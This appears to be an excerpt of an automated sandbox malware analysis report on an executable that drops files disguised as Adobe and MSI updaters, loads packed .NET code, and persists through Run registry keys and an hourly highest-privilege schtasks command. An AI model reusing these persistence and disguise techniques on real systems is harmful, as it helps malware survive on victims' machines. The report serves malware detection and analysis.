Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: webio.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rstrtmgr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: d3d11.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dxgi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: d3d10warp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dxcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wininet.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: devobj.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: webio.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rstrtmgr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: d3d11.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dxgi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: d3d10warp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dxcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wininet.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: devobj.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: webio.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\AdobeUpdaterV1_93c4750d07be7885c8f839a66372e48f\AdobeUpdaterV1.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\AdobeUpdaterV1_93c4750d07be7885c8f839a66372e48f\AdobeUpdaterV1.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\AdobeUpdaterV1_93c4750d07be7885c8f839a66372e48f\AdobeUpdaterV1.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\AdobeUpdaterV1_93c4750d07be7885c8f839a66372e48f\AdobeUpdaterV1.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\AdobeUpdaterV1_93c4750d07be7885c8f839a66372e48f\AdobeUpdaterV1.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\AdobeUpdaterV1_93c4750d07be7885c8f839a66372e48f\AdobeUpdaterV1.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\AdobeUpdaterV1_93c4750d07be7885c8f839a66372e48f\AdobeUpdaterV1.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\AdobeUpdaterV1_93c4750d07be7885c8f839a66372e48f\AdobeUpdaterV1.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\AdobeUpdaterV1_93c4750d07be7885c8f839a66372e48f\AdobeUpdaterV1.exe	Section loaded: wldp.dll

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\ProgramData\MPGPH1\MPGPH1.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Source: C:\Users\user\Desktop\OJa1BOigU3.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: OJa1BOigU3.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: OJa1BOigU3.exe

Static file information: File size 6990616 > 1048576

Source: OJa1BOigU3.exe

Static PE information: Raw size of .vmp is bigger than: 0x100000 < 0x5cc200

Source:	Binary string: NETCrypt.pdb source: OJa1BOigU3.exe, 00000000.00000003.2278188796.00000000068DA000.00000004.00000020.00020000.00000000.sdmp, U8cABsPhZFkKRrQ4rE0N.exe, 0000000F.00000000.2287643902.0000000000BB2000.00000002.00000001.01000000.00000008.sdmp, U8cABsPhZFkKRrQ4rE0N.exe.0.dr, lumma2804[1].exe.0.dr, MSIUpdaterV1.exe0.0.dr
Source:	Binary string: RegAsm.pdb source: RegAsm.exe, 00000019.00000002.3510229323.0000000000ED6000.00000004.00000020.00020000.00000000.sdmp, MPGPH1.exe, 00000024.00000000.2415322338.0000000000482000.00000002.00000001.01000000.0000000F.sdmp, RegAsm.exe, 0000002A.00000002.3509011004.0000000001236000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002C.00000002.3509342638.0000000001554000.00000004.00000020.00020000.00000000.sdmp, MPGPH1.exe.25.dr, RageMP1.exe.25.dr
Source:	Binary string: d:\DMG_1102CTP\src\ndp\fx\src\DataWeb\Server\objr\i386\Microsoft.Data.Services.pdb source: Microsoft.Data.Services.dll
Source:	Binary string: RegAsm.pdb4 source: RegAsm.exe, 00000019.00000002.3510229323.0000000000ED6000.00000004.00000020.00020000.00000000.sdmp, MPGPH1.exe, 00000024.00000000.2415322338.0000000000482000.00000002.00000001.01000000.0000000F.sdmp, RegAsm.exe, 0000002A.00000002.3509011004.0000000001236000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002C.00000002.3509342638.0000000001554000.00000004.00000020.00020000.00000000.sdmp, MPGPH1.exe.25.dr, RageMP1.exe.25.dr

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: lumma2804[1].exe.0.dr, gBMthepoZSL1ZVKpeA.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: U8cABsPhZFkKRrQ4rE0N.exe.0.dr, gBMthepoZSL1ZVKpeA.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: AdobeUpdaterV1.exe0.0.dr, gBMthepoZSL1ZVKpeA.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: MSIUpdaterV1.exe0.0.dr, gBMthepoZSL1ZVKpeA.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})

Source: initial sample

Static PE information: section where entry point is pointing to: .vmp

Source: AdobeUpdaterV1.exe0.0.dr	Static PE information: real checksum: 0x0 should be: 0x81d01
Source: lumma2804[1].exe.0.dr	Static PE information: real checksum: 0x0 should be: 0x81d01
Source: retailerTest[1].exe.0.dr	Static PE information: real checksum: 0x1d9ce2 should be: 0x1cf7d3
Source: MSIUpdaterV1.exe1.0.dr	Static PE information: real checksum: 0x1d9ce2 should be: 0x1cf7d3
Source: v6ggwc2fJXXgIu5fzDQ2.exe.0.dr	Static PE information: real checksum: 0x1d9ce2 should be: 0x1cf7d3
Source: U8cABsPhZFkKRrQ4rE0N.exe.0.dr	Static PE information: real checksum: 0x0 should be: 0x81d01
Source: AdobeUpdaterV1.exe1.0.dr	Static PE information: real checksum: 0x1d9ce2 should be: 0x1cf7d3
Source: MSIUpdaterV1.exe0.0.dr	Static PE information: real checksum: 0x0 should be: 0x81d01

Source: OJa1BOigU3.exe	Static PE information: section name: .vmp
Source: OJa1BOigU3.exe	Static PE information: section name: .vmp
Source: OJa1BOigU3.exe	Static PE information: section name: .vmp
Source: Retailer_prog[1].exe.0.dr	Static PE information: section name: .vmp
Source: Retailer_prog[1].exe.0.dr	Static PE information: section name: .vmp
Source: Retailer_prog[1].exe.0.dr	Static PE information: section name: .vmp
Source: 3Q7v9y6Zw0a51Z43zHih.exe.0.dr	Static PE information: section name: .vmp
Source: 3Q7v9y6Zw0a51Z43zHih.exe.0.dr	Static PE information: section name: .vmp
Source: 3Q7v9y6Zw0a51Z43zHih.exe.0.dr	Static PE information: section name: .vmp
Source: AdobeUpdaterV1.exe.0.dr	Static PE information: section name: .vmp
Source: AdobeUpdaterV1.exe.0.dr	Static PE information: section name: .vmp
Source: AdobeUpdaterV1.exe.0.dr	Static PE information: section name: .vmp
Source: MSIUpdaterV1.exe.0.dr	Static PE information: section name: .vmp
Source: MSIUpdaterV1.exe.0.dr	Static PE information: section name: .vmp
Source: MSIUpdaterV1.exe.0.dr	Static PE information: section name: .vmp

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 17_2_00445404 push esi; ret	17_2_00445405
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 17_2_0042F5A3 push ebp; iretd	17_2_0042F5A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 17_2_0042CC8B push ecx; retf	17_2_0042CC92
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 17_2_00444EA6 push cs; iretd	17_2_00444EA7
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe	Code function: 22_2_0039B2ED push ecx; ret	22_2_0039B300
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe	Code function: 22_2_003F8349 push ecx; ret	22_2_003F835C
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe	Code function: 22_2_003F8349 push ecx; ret	22_2_003F835C
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe	Code function: 22_2_003F8349 push ecx; ret	22_2_003F835C
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe	Code function: 22_2_003F8349 push ecx; ret	22_2_003F835C
Source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	Code function: 23_2_0011B2ED push ecx; ret	23_2_0011B300
Source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	Code function: 23_2_00178349 push ecx; ret	23_2_0017835C
Source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	Code function: 23_2_00178349 push ecx; ret	23_2_0017835C
Source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	Code function: 23_2_00178349 push ecx; ret	23_2_0017835C
Source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	Code function: 23_2_00178349 push ecx; ret	23_2_0017835C

Source: lumma2804[1].exe.0.dr	Static PE information: section name: .text entropy: 7.635385342087686
Source: U8cABsPhZFkKRrQ4rE0N.exe.0.dr	Static PE information: section name: .text entropy: 7.635385342087686
Source: AdobeUpdaterV1.exe0.0.dr	Static PE information: section name: .text entropy: 7.635385342087686
Source: MSIUpdaterV1.exe0.0.dr	Static PE information: section name: .text entropy: 7.635385342087686

Source: lumma2804[1].exe.0.dr, eRtoUikQAUlfmrcXhP.cs	High entropy of concatenated method names: 'WKIpT6WRYP', 'GxIp0d0vl2', 'R3Ppdmg34A', 'iAsp1JjQqZ', 'yQwppAuByG', 'BT0pvkDekn', 'ENbpFei3CE', 'YlPUn7XuQH', 'Qsnpc1Onv9', 'jAdpZCXbre'
Source: lumma2804[1].exe.0.dr, gBMthepoZSL1ZVKpeA.cs	High entropy of concatenated method names: 'reTlcDMFua', 'nW4lBacjpc', 'sMLlkdoJ60', 'I5LlJVOMeQ', 'qdll7OAZFb', 'QEmlZSRGOw', 'Bst2GisoW1', 'N15X2cY3J', 'NWNp5BRFs', 'Q59l6jZOT'
Source: U8cABsPhZFkKRrQ4rE0N.exe.0.dr, eRtoUikQAUlfmrcXhP.cs	High entropy of concatenated method names: 'WKIpT6WRYP', 'GxIp0d0vl2', 'R3Ppdmg34A', 'iAsp1JjQqZ', 'yQwppAuByG', 'BT0pvkDekn', 'ENbpFei3CE', 'YlPUn7XuQH', 'Qsnpc1Onv9', 'jAdpZCXbre'
Source: U8cABsPhZFkKRrQ4rE0N.exe.0.dr, gBMthepoZSL1ZVKpeA.cs	High entropy of concatenated method names: 'reTlcDMFua', 'nW4lBacjpc', 'sMLlkdoJ60', 'I5LlJVOMeQ', 'qdll7OAZFb', 'QEmlZSRGOw', 'Bst2GisoW1', 'N15X2cY3J', 'NWNp5BRFs', 'Q59l6jZOT'
Source: AdobeUpdaterV1.exe0.0.dr, eRtoUikQAUlfmrcXhP.cs	High entropy of concatenated method names: 'WKIpT6WRYP', 'GxIp0d0vl2', 'R3Ppdmg34A', 'iAsp1JjQqZ', 'yQwppAuByG', 'BT0pvkDekn', 'ENbpFei3CE', 'YlPUn7XuQH', 'Qsnpc1Onv9', 'jAdpZCXbre'
Source: AdobeUpdaterV1.exe0.0.dr, gBMthepoZSL1ZVKpeA.cs	High entropy of concatenated method names: 'reTlcDMFua', 'nW4lBacjpc', 'sMLlkdoJ60', 'I5LlJVOMeQ', 'qdll7OAZFb', 'QEmlZSRGOw', 'Bst2GisoW1', 'N15X2cY3J', 'NWNp5BRFs', 'Q59l6jZOT'
Source: MSIUpdaterV1.exe0.0.dr, eRtoUikQAUlfmrcXhP.cs	High entropy of concatenated method names: 'WKIpT6WRYP', 'GxIp0d0vl2', 'R3Ppdmg34A', 'iAsp1JjQqZ', 'yQwppAuByG', 'BT0pvkDekn', 'ENbpFei3CE', 'YlPUn7XuQH', 'Qsnpc1Onv9', 'jAdpZCXbre'
Source: MSIUpdaterV1.exe0.0.dr, gBMthepoZSL1ZVKpeA.cs	High entropy of concatenated method names: 'reTlcDMFua', 'nW4lBacjpc', 'sMLlkdoJ60', 'I5LlJVOMeQ', 'qdll7OAZFb', 'QEmlZSRGOw', 'Bst2GisoW1', 'N15X2cY3J', 'NWNp5BRFs', 'Q59l6jZOT'

Source: C:\Users\user\Desktop\OJa1BOigU3.exe	File created: C:\Users\user\AppData\Local\AdobeUpdaterV1_209ffc424b0966fd64861c7290d2a06a\AdobeUpdaterV1.exe	Jump to dropped file
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	File created: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\3Q7v9y6Zw0a51Z43zHih.exe	Jump to dropped file
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	File created: C:\Users\user\AppData\Local\AdobeUpdaterV1_93c4750d07be7885c8f839a66372e48f\AdobeUpdaterV1.exe	Jump to dropped file
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	File created: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\U8cABsPhZFkKRrQ4rE0N.exe	Jump to dropped file
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	File created: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe	Jump to dropped file
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	File created: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe	Jump to dropped file
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\lumma2804[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Retailer_prog[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\retailerTest[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	File created: C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\MPGPH1\MPGPH1.exe	Jump to dropped file
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	File created: C:\Users\user\AppData\Local\AdobeUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\AdobeUpdaterV1.exe	Jump to dropped file
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	File created: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\RageMP1\RageMP1.exe	Jump to dropped file

Source: C:\Users\user\Desktop\OJa1BOigU3.exe	File created: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe	Jump to dropped file
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	File created: C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\MPGPH1\MPGPH1.exe	Jump to dropped file
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	File created: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	Jump to dropped file

Boot Survival

Creates multiple autostart registry keys

Source: C:\Users\user\Desktop\OJa1BOigU3.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV1_93c4750d07be7885c8f839a66372e48f	Jump to behavior
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV1_209ffc424b0966fd64861c7290d2a06a	Jump to behavior
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RageMP1

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\OJa1BOigU3.exe

Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe" /tn "MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe HR" /sc HOURLY /rl HIGHEST

Source: C:\Users\user\Desktop\OJa1BOigU3.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe	Jump to behavior
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe	Jump to behavior
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV1_93c4750d07be7885c8f839a66372e48f	Jump to behavior
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV1_93c4750d07be7885c8f839a66372e48f	Jump to behavior
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV1_209ffc424b0966fd64861c7290d2a06a	Jump to behavior
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV1_209ffc424b0966fd64861c7290d2a06a	Jump to behavior
